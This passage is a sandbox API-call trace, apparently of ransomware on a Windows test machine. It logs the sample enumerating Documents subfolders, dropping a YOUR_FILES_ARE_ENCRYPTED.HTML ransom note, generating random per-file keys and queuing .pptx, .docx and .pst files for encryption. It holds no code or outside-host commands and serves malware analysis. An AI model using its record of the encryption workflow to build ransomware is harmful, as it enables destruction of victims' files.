lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5eba540, ftCreationTime.dwHighDateTime=0x1d7e773, ftLastAccessTime.dwLowDateTime=0x284dd9a0, ftLastAccessTime.dwHighDateTime=0x1d7e78b, ftLastWriteTime.dwLowDateTime=0x284dd9a0, ftLastWriteTime.dwHighDateTime=0x1d7e78b, nFileSizeHigh=0x0, nFileSizeLow=0x6f89, dwReserved0=0x151515, dwReserved1=0x0, cFileName="vrGluN.doc", cAlternateFileName="")) returned 0 [0167.028] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0167.029] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\lil9-3r\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 71 [0167.029] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\lil9-3r\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\documents\\lil9-3r\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0167.029] WriteFile (in: hFile=0x5ac, lpBuffer=0x44fe028*, 
nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0167.031] CloseHandle (hObject=0x5ac) returned 1 [0167.032] GetProcessHeap () returned 0x270000 [0167.032] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0167.032] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0xd26fc530, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd26fc530, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd26fc530, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0167.033] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\My Music") returned 42 [0167.033] GetProcessHeap () returned 0x270000 [0167.033] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74c2008 [0167.033] lstrcpyW (in: lpString1=0x74c2008, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\My Music" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\My Music") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\My Music" [0167.033] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\My Music", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\My Music\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\My Music\\*" [0167.033] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\My Music\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5eba540, ftCreationTime.dwHighDateTime=0x1d7e773, ftLastAccessTime.dwLowDateTime=0x284dd9a0, 
ftLastAccessTime.dwHighDateTime=0x1d7e78b, ftLastWriteTime.dwLowDateTime=0x284dd9a0, ftLastWriteTime.dwHighDateTime=0x1d7e78b, nFileSizeHigh=0x0, nFileSizeLow=0x6f89, dwReserved0=0x151515, dwReserved1=0x0, cFileName="vrGluN.doc", cAlternateFileName="ꅨݏ")) returned 0xffffffff [0167.033] GetProcessHeap () returned 0x270000 [0167.034] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0167.034] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0xd26fc530, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd26fc530, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd26fc530, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0167.034] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\My Pictures") returned 45 [0167.034] GetProcessHeap () returned 0x270000 [0167.034] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74c2008 [0167.034] lstrcpyW (in: lpString1=0x74c2008, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\My Pictures" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\My Pictures") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\My Pictures" [0167.034] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\My Pictures", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\My Pictures\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\My Pictures\\*" [0167.034] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\My Pictures\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5eba540, 
ftCreationTime.dwHighDateTime=0x1d7e773, ftLastAccessTime.dwLowDateTime=0x284dd9a0, ftLastAccessTime.dwHighDateTime=0x1d7e78b, ftLastWriteTime.dwLowDateTime=0x284dd9a0, ftLastWriteTime.dwHighDateTime=0x1d7e78b, nFileSizeHigh=0x0, nFileSizeLow=0x6f89, dwReserved0=0x151515, dwReserved1=0x0, cFileName="vrGluN.doc", cAlternateFileName="ꅨݏ")) returned 0xffffffff [0167.034] GetProcessHeap () returned 0x270000 [0167.035] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0167.035] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0xd26fc530, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd26fc530, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd26fc530, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0167.035] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\My Videos") returned 43 [0167.035] GetProcessHeap () returned 0x270000 [0167.035] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74c2008 [0167.035] lstrcpyW (in: lpString1=0x74c2008, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\My Videos" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\My Videos") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\My Videos" [0167.035] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\My Videos", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\My Videos\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\My Videos\\*" [0167.035] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\My Videos\\*", lpFindFileData=0x4ebdb54 | out: 
lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5eba540, ftCreationTime.dwHighDateTime=0x1d7e773, ftLastAccessTime.dwLowDateTime=0x284dd9a0, ftLastAccessTime.dwHighDateTime=0x1d7e78b, ftLastWriteTime.dwLowDateTime=0x284dd9a0, ftLastWriteTime.dwHighDateTime=0x1d7e78b, nFileSizeHigh=0x0, nFileSizeLow=0x6f89, dwReserved0=0x151515, dwReserved1=0x0, cFileName="vrGluN.doc", cAlternateFileName="ꅨݏ")) returned 0xffffffff [0167.035] GetProcessHeap () returned 0x270000 [0167.036] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0167.036] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb60bd110, ftCreationTime.dwHighDateTime=0x1d76802, ftLastAccessTime.dwLowDateTime=0x9842b860, ftLastAccessTime.dwHighDateTime=0x1d7a056, ftLastWriteTime.dwLowDateTime=0x9842b860, ftLastWriteTime.dwHighDateTime=0x1d7a056, nFileSizeHigh=0x0, nFileSizeLow=0x16d12, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="ohf p64bSEpu.pptx", cAlternateFileName="OHFP64~1.PPT")) returned 1 [0167.036] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\ohf p64bSEpu.pptx") returned 51 [0167.036] lstrcmpW (lpString1="ohf p64bSEpu.pptx", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0167.036] PathFindExtensionW (pszPath="ohf p64bSEpu.pptx") returned=".pptx" [0167.036] lstrlenW (lpString=".pptx") returned 5 [0167.036] PathFindExtensionW (pszPath="ohf p64bSEpu.pptx") returned=".pptx" [0167.036] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0167.036] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\ohf p64bSEpu.pptx" (normalized: "c:\\users\\5alr3u30d3\\documents\\ohf p64bsepu.pptx"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, 
dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ac [0167.037] GetFileSizeEx (in: hFile=0x5ac, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=93458) returned 1 [0167.037] GetProcessHeap () returned 0x270000 [0167.037] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0167.038] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="79") returned 2 [0167.038] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="49") returned 2 [0167.038] wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: param_1="36") returned 2 [0167.038] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="C4") returned 2 [0167.038] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="9B") returned 2 [0167.038] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="AC") returned 2 [0167.038] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="08") returned 2 [0167.038] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="DD") returned 2 [0167.038] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="8A") returned 2 [0167.038] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="C8") returned 2 [0167.038] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="8E") returned 2 [0167.038] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="CC") returned 2 [0167.038] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="14") returned 2 [0167.038] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="66") returned 2 [0167.038] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: param_1="27") returned 2 [0167.039] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="EA") returned 2 [0167.039] wsprintfW (in: param_1=0x4ebdd82, param_2="%02X" | out: param_1="EA") returned 2 [0167.039] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="B4") returned 
2 [0167.039] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="B6") returned 2 [0167.039] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="37") returned 2 [0167.039] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="1F") returned 2 [0167.039] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="82") returned 2 [0167.039] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="4C") returned 2 [0167.039] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="AC") returned 2 [0167.039] wsprintfW (in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="F7") returned 2 [0167.039] wsprintfW (in: param_1=0x4ebdda6, param_2="%02X" | out: param_1="54") returned 2 [0167.039] wsprintfW (in: param_1=0x4ebddaa, param_2="%02X" | out: param_1="C3") returned 2 [0167.039] wsprintfW (in: param_1=0x4ebddae, param_2="%02X" | out: param_1="57") returned 2 [0167.039] wsprintfW (in: param_1=0x4ebddb2, param_2="%02X" | out: param_1="A6") returned 2 [0167.039] wsprintfW (in: param_1=0x4ebddb6, param_2="%02X" | out: param_1="ED") returned 2 [0167.039] wsprintfW (in: param_1=0x4ebddba, param_2="%02X" | out: param_1="AF") returned 2 [0167.039] wsprintfW (in: param_1=0x4ebddbe, param_2="%02X" | out: param_1="38") returned 2 [0167.040] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\ohf p64bSEpu.pptx" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\ohf p64bSEpu.pptx") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\ohf p64bSEpu.pptx" [0167.040] CreateIoCompletionPort (FileHandle=0x5ac, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0167.040] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0167.174] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, 
ftCreationTime.dwLowDateTime=0x3e3b8c60, ftCreationTime.dwHighDateTime=0x1d78b30, ftLastAccessTime.dwLowDateTime=0xe326e8d0, ftLastAccessTime.dwHighDateTime=0x1d79325, ftLastWriteTime.dwLowDateTime=0xe326e8d0, ftLastWriteTime.dwHighDateTime=0x1d79325, nFileSizeHigh=0x0, nFileSizeLow=0x14cfb, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="otlV MF8xoszJZMG1k_q.docx", cAlternateFileName="OTLVMF~1.DOC")) returned 1 [0167.174] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\otlV MF8xoszJZMG1k_q.docx") returned 59 [0167.174] lstrcmpW (lpString1="otlV MF8xoszJZMG1k_q.docx", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0167.174] PathFindExtensionW (pszPath="otlV MF8xoszJZMG1k_q.docx") returned=".docx" [0167.174] lstrlenW (lpString=".docx") returned 5 [0167.174] PathFindExtensionW (pszPath="otlV MF8xoszJZMG1k_q.docx") returned=".docx" [0167.174] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0167.174] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\otlV MF8xoszJZMG1k_q.docx" (normalized: "c:\\users\\5alr3u30d3\\documents\\otlv mf8xoszjzmg1k_q.docx"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ac [0167.175] GetFileSizeEx (in: hFile=0x5ac, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=85243) returned 1 [0167.175] GetProcessHeap () returned 0x270000 [0167.175] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0167.176] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="9F") returned 2 [0167.176] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="22") returned 2 [0167.176] wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: param_1="2F") returned 2 [0167.176] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: 
param_1="B3") returned 2 [0167.176] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="EE") returned 2 [0167.176] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="D1") returned 2 [0167.176] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="49") returned 2 [0167.176] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="58") returned 2 [0167.176] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="C3") returned 2 [0167.176] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="DD") returned 2 [0167.176] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="C9") returned 2 [0167.176] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="C3") returned 2 [0167.176] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="29") returned 2 [0167.176] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="8A") returned 2 [0167.177] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: param_1="30") returned 2 [0167.177] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="DA") returned 2 [0167.177] wsprintfW (in: param_1=0x4ebdd82, param_2="%02X" | out: param_1="85") returned 2 [0167.177] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="E7") returned 2 [0167.177] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="0C") returned 2 [0167.177] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="9F") returned 2 [0167.177] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="6F") returned 2 [0167.177] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="68") returned 2 [0167.177] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="D4") returned 2 [0167.177] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="F5") returned 2 [0167.177] wsprintfW (in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="17") returned 2 [0167.177] wsprintfW (in: 
param_1=0x4ebdda6, param_2="%02X" | out: param_1="B2") returned 2 [0167.177] wsprintfW (in: param_1=0x4ebddaa, param_2="%02X" | out: param_1="8C") returned 2 [0167.177] wsprintfW (in: param_1=0x4ebddae, param_2="%02X" | out: param_1="2A") returned 2 [0167.177] wsprintfW (in: param_1=0x4ebddb2, param_2="%02X" | out: param_1="D0") returned 2 [0167.177] wsprintfW (in: param_1=0x4ebddb6, param_2="%02X" | out: param_1="C0") returned 2 [0167.177] wsprintfW (in: param_1=0x4ebddba, param_2="%02X" | out: param_1="99") returned 2 [0167.177] wsprintfW (in: param_1=0x4ebddbe, param_2="%02X" | out: param_1="67") returned 2 [0167.178] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\otlV MF8xoszJZMG1k_q.docx" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\otlV MF8xoszJZMG1k_q.docx") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\otlV MF8xoszJZMG1k_q.docx" [0167.178] CreateIoCompletionPort (FileHandle=0x5ac, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0167.178] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0167.195] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c57820, ftCreationTime.dwHighDateTime=0x1d709ba, ftLastAccessTime.dwLowDateTime=0x69b38e50, ftLastAccessTime.dwHighDateTime=0x1d7100c, ftLastWriteTime.dwLowDateTime=0x69b38e50, ftLastWriteTime.dwHighDateTime=0x1d7100c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Outlook Files", cAlternateFileName="OUTLOO~1")) returned 1 [0167.195] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\Outlook Files") returned 47 [0167.195] GetProcessHeap () returned 0x270000 [0167.195] RtlAllocateHeap 
(HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74c2008 [0167.195] lstrcpyW (in: lpString1=0x74c2008, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\Outlook Files" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\Outlook Files") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\Outlook Files" [0167.195] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\Outlook Files", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\Outlook Files\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\Outlook Files\\*" [0167.195] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\Outlook Files\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c57820, ftCreationTime.dwHighDateTime=0x1d709ba, ftLastAccessTime.dwLowDateTime=0x69b38e50, ftLastAccessTime.dwHighDateTime=0x1d7100c, ftLastWriteTime.dwLowDateTime=0x69b38e50, ftLastWriteTime.dwHighDateTime=0x1d7100c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x125c8d5, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0167.196] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c57820, ftCreationTime.dwHighDateTime=0x1d709ba, ftLastAccessTime.dwLowDateTime=0x69b38e50, ftLastAccessTime.dwHighDateTime=0x1d7100c, ftLastWriteTime.dwLowDateTime=0x69b38e50, ftLastWriteTime.dwHighDateTime=0x1d7100c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x125c8d5, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0167.196] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x28ca3ae0, ftCreationTime.dwHighDateTime=0x1d709ba, ftLastAccessTime.dwLowDateTime=0x28ca3ae0, ftLastAccessTime.dwHighDateTime=0x1d709ba, 
ftLastWriteTime.dwLowDateTime=0x82a61770, ftLastWriteTime.dwHighDateTime=0x1d7100c, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0x125c8d5, dwReserved1=0x0, cFileName="norman@gdllo.de.pst", cAlternateFileName="NORMAN~1.PST")) returned 1 [0167.196] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\Outlook Files\\norman@gdllo.de.pst") returned 67 [0167.196] lstrcmpW (lpString1="norman@gdllo.de.pst", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0167.196] PathFindExtensionW (pszPath="norman@gdllo.de.pst") returned=".pst" [0167.196] lstrlenW (lpString=".pst") returned 4 [0167.196] PathFindExtensionW (pszPath="norman@gdllo.de.pst") returned=".pst" [0167.196] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0167.196] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\Outlook Files\\norman@gdllo.de.pst" (normalized: "c:\\users\\5alr3u30d3\\documents\\outlook files\\norman@gdllo.de.pst"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0167.197] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=271360) returned 1 [0167.197] GetProcessHeap () returned 0x270000 [0167.197] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7690008 [0167.198] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="47") returned 2 [0167.198] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="67") returned 2 [0167.198] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="94") returned 2 [0167.198] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="B1") returned 2 [0167.198] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="DD") returned 2 [0167.198] wsprintfW (in: param_1=0x4ebda4a, 
param_2="%02X" | out: param_1="A4") returned 2 [0167.198] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="BC") returned 2 [0167.198] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="87") returned 2 [0167.198] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="0F") returned 2 [0167.198] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="96") returned 2 [0167.198] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="98") returned 2 [0167.199] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="92") returned 2 [0167.199] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="12") returned 2 [0167.199] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="2B") returned 2 [0167.199] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="80") returned 2 [0167.199] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="7A") returned 2 [0167.199] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="B7") returned 2 [0167.199] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="FC") returned 2 [0167.199] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="BA") returned 2 [0167.199] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="3B") returned 2 [0167.199] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="00") returned 2 [0167.199] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="3A") returned 2 [0167.199] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="B2") returned 2 [0167.199] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="25") returned 2 [0167.199] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="AE") returned 2 [0167.199] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="36") returned 2 [0167.199] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="A3") returned 2 [0167.199] wsprintfW 
